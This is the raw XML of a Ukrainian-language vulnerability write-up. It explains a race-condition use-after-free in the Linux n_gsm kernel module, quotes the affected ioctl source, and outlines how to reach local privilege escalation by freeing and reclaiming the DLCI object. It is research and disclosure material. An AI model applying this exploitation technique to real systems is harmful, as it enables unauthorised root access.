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left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_buhwfsxbysr1" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Кримінальне чтиво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hyperlink r:id="rId6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Telegram autor</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId7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Telegram chat</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId8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Github repo</w:t>
        </w:r>
      </w:hyperlink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Зимою мені пощастило знайти помилку в linux модулі n_gsm. Даний модуль використовується для реалізації протоколу мультиплексування GSM 07.10. Даний тип помилки був "Race Condtiton" який призводить до "User - After - Free". Дивлячись на код я зрозумів що це можна використати для того, щоб виконати свій код в ядрі Linux та отримати LPE(Розширення локальних привілеїв) на потенційній жертві. На знімку ниже ви побачите результат атаки. Для експлоїта потрібна наявність кернел модуля n_gsm, доступ до CLONE_NEWUSER а також підтримка Xen ядром жертви.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007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-1424</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>171450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731200" cy="4279900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79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144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Ubuntu 22.04 Dekstop 6.5 kernel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C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Тепер детально розповім про помилку яка була знайдена в коді модуля ядра. З випуском версії 6.4 ядра Linux в модулі n_gsm з'явилася опція </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GSMIOC_SETCONF_DLCI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> для виклику через ioctl. Дана опція потрібна, щоб оновити конфігурацію </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DLCI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Data Link Connection Identifier).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsmld_ioctl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(struct tty_struct *tty,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 cmd,</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab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 arg)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br w:type="textWrapping"/>
              <w:t xml:space="preserve">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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_config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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">c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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_config_ext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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ce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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_dlci_config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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">dc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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_mux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*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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">tty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-&gt;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">disc_data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base, addr;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_dlci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*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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">dlci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switch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(cmd)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GSMIOC_GETCONF:</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_copy_config_values(gsm, &amp;c);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(copy_to_user((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__user *)arg, &amp;c,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(c)))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-EFAULT;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GSMIOC_SETCONF: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(copy_from_user(&amp;c, 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__user *)arg,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(c)))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-EFAULT;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gsm_config(gsm, &amp;c);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GSMIOC_GETFIRST:</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">base = mux_num_to_base(gsm);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put_user(base +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, (__u32 __user *)arg);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GSMIOC_GETCONF_EXT:</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_copy_config_ext_values(gsm, &amp;ce);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(copy_to_user((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__user *)arg, &amp;ce,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(ce)))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-EFAULT;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GSMIOC_SETCONF_EXT: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(copy_from_user(&amp;ce, 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__user *)arg,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(ce)))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-EFAULT;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gsm_config_ext(gsm, &amp;ce);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GSMIOC_GETCONF_DLCI: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(copy_from_user(&amp;dc, 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__user *)arg,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(dc)))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-EFAULT;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(dc.channel ==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|| dc.channel &gt;= NUM_DLCI)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-EINVAL;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">addr = array_index_nospec(dc.channel, NUM_DLCI);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci = gsm-&gt;dlci[addr];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(!dlci) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci = gsm_dlci_alloc(gsm, addr);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(!dlci)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-ENOMEM;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">}</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_dlci_copy_config_values(dlci, &amp;dc);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(copy_to_user((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__user *)arg, &amp;dc,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(dc)))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-EFAULT;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GSMIOC_SETCONF_DLCI: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(copy_from_user(&amp;dc, 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__user *)arg,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(dc)))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-EFAULT;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(dc.channel ==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|| dc.channel &gt;= NUM_DLCI)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-EINVAL;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">addr = array_index_nospec(dc.channel, NUM_DLCI);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci = gsm-&gt;dlci[addr];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(!dlci) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci = gsm_dlci_alloc(gsm, addr);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(!dlci)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-ENOMEM;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">}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gsm_dlci_config(dlci, &amp;dc,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default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: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n_tty_ioctl_helper(tty, cmd, arg);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">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ind w:firstLine="72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(Сode 1) Код обробника виклику ioctl в модулі n_gsm.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Як бачимо по відривку коду Code 1 в нашому обробнику ioctl за опцією </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GSMIOC_SETCONF_DLCI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> викликається</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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функція </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gsm_dlci_config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> яка і відповідає за оновлення dlci.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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 функцію gsm_dlci_config передається об'єкт DLCI  з масиву структури gsm_mux індекс якого вказуємо в структурі конфігурації. Також передається сама структура конфігурації struct gsm_dlci_config. Так функція і структура конфігурації має однакову назву, не дивуйтесь.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Приклад виклику GSMIOC_SETCONF_DLCI:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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19171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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c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6"/>
                <w:szCs w:val="26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z w:val="26"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_dlci_config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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">__u32 channel;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e7887"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* DLCI (0 for the associated DLCI) */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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">__u32 adaption;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e7887"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Convergence layer type */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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">__u32 mtu;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e7887"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Maximum transfer unit */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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">__u32 priority;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e7887"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Priority (0 for default value) */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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">__u32 i;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e7887"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Frame type (1 = UIH, 2 = UI) */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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">__u32 k;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e7887"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Window size (0 for default value) */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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">__u32 reserved[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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">];    </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7e7887"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* For future use, must be initialized to zero */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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">} config;</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">config.channel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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c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7e7887"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">//індекс dlci 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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">ioctl(fd,GSMIOC_SETCONF_DLCI,config);</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7e7887"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">//виклик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Далі перейдемо в саму функцію gsm_dlci_config.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_dlci_config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(struct gsm_dlci *dlci, struct gsm_dlci_config *dc,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 open)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br w:type="textWrapping"/>
              <w:t xml:space="preserve">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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_mux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*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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm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need_restart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need_open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i;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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/*</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> * Check that userspace doesn't put stuff in here to prevent breakages</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> * in the future.</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> */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(i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; i &lt; ARRAY_SIZE(dc-&gt;reserved); i++)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(dc-&gt;reserved[i])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-EINVAL;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(!dlci)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-EINVAL;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">gsm = dlci-&gt;gsm;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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Stuff we don't support yet - I frame transport */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(dc-&gt;adaption !=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&amp;&amp; dc-&gt;adaption !=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)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-EOPNOTSUPP;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(dc-&gt;mtu &gt; MAX_MTU || dc-&gt;mtu &lt; MIN_MTU || dc-&gt;mtu &gt; gsm-&gt;mru)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-EINVAL;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(dc-&gt;priority &gt;=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64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)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-EINVAL;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(dc-&gt;i ==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|| dc-&gt;i &gt;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)  </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* UIH and UI only */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-EINVAL;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(dc-&gt;k &gt;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)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-EINVAL;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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/*</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> * See what is needed for reconfiguration</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> */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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Framing fields */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(dc-&gt;adaption != dlci-&gt;adaption)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">need_restart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(dc-&gt;mtu != dlci-&gt;mtu)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">need_restart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(dc-&gt;i != dlci-&gt;ftype)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">need_restart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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Requires care */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(dc-&gt;priority != dlci-&gt;prio)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">need_restart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((open &amp;&amp; gsm-&gt;wait_config) || need_restart)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">need_open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(dlci-&gt;state == DLCI_WAITING_CONFIG) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">need_restart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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">need_open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;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/*</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> * Close down what is needed, restart and initiate the new</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> * configuration.</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> */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(need_restart) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_dlci_begin_close(dlci);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">wait_event_interruptible(gsm-&gt;event, dlci-&gt;state == DLCI_CLOSED);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(signal_pending(current))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-EINTR;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}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7e7887"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/*</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> * Setup the new configuration values</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve"> */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br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;adaption = 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)dc-&gt;adaption;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(dc-&gt;mtu)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;mtu = 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)dc-&gt;mtu;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br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;mtu = gsm-&gt;mtu;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(dc-&gt;priority)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;prio = (u8)dc-&gt;priority;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br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;prio = roundup(dlci-&gt;addr +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) -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(dc-&gt;i ==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)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;ftype = UIH;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(dc-&gt;i ==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)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;ftype = UI;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(dc-&gt;k)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;k = (u8)dc-&gt;k;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br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci-&gt;k = gsm-&gt;k;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(need_open) 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(gsm-&gt;initiator)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_dlci_begin_open(dlci);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br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_dlci_set_opening(dlci);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">}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jc w:val="center"/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Code 2 функція </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gsm_dlci_config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Алгоритм ці функції полягає в, тому що вона спочатку перевіряє структуру конфігурації на неправильні аргументи, далі визначає чи потрібно перезапускати DLCI, а потім вже оновлює свою конфігурацію на нашу яку передали через ioctl. Тепер ми приступаємо до  самої суті. У функції є етап коли вона по аргументах визначає що їй потрібно перезапустити dlci.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19171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(need_restart) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_dlci_begin_close(dlci);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">wait_event_interruptible(gsm-&gt;event, dlci-&gt;state == DLCI_CLOSED);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(signal_pending(current))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-EINTR;</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab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 цих строках кода бачимо що спочатку відправляється команда на початок закриття DLCI  до клієнта через функцію gsm_dlci_begin_close() а потім на наступному рядку коду використовується функція wait_event_interruptible для очікування умови коли стан DLCI буде закритим.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DLCI можна закрити за допомогою команди DISC|PF яка відправляється на зв'язковий канал n_gsm. Або c закінченням терміну дії таймера який автоматично закриває dlci.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Ви, мабуть, уже помітили таку особливість що виклик функції gsm_dlci_config взагалі не синхронізований, не має ніяких блокувальних засобів всередині функції. Можна зробити що завгодно з DLCI поки функція gsm_dlci_confi буде очікувати його закриття.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A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Тепер переходимо до експлуатації цієї помилки.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 очікуванні закриття DLCI в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"wait_event_interruptible(gsm-&gt;event, dlci-&gt;state == DLCI_CLOSED);"  викликаємо через ioctl функцію gsm_config яка знаходиться за параметром GSMIOC_SETCONF.  Дана функція перезапускає MUX разом з тим вивільняє всі виділені до цього DLCI. Це наш "Free". Далі ми виділяємо об'єкт с розміром кешу нашої структури, а це 1024. В нашому фейковому об'єкті  заповнюємо поле state на DLCI_CLOSED тому, що нам треба вийти з wait_event_interruptible. Але цього не достатньо щоб вийти з режиму очікування, треба ще розбудити чергу очікування gsm-&gt;event. Це можна зробити за допомогою відправлення пакета SABM|PF який в обробнику пакетів n_gsm викликає gsm_dlci_open. Ви це зможете побачити внизу на відривку коду.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19171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switch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(gsm-&gt;control)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SABM|PF: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(cr ==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)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goto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invalid;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(dlci ==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)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">dlci = gsm_dlci_alloc(gsm, address);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(dlci ==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)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(dlci-&gt;dead)</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_response(gsm, address, DM|PF);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{</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_response(gsm, address, UA|PF);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">gsm_dlci_open(dlci);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:tab/>
              <w:t xml:space="preserve">}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Тепер заглянемо в функцію gsm_dlci_open.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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_dlci_open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(struct gsm_dlci *dlci)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br w:type="textWrapping"/>
              <w:t xml:space="preserve">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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm_mux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*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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gsm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z w:val="24"/>
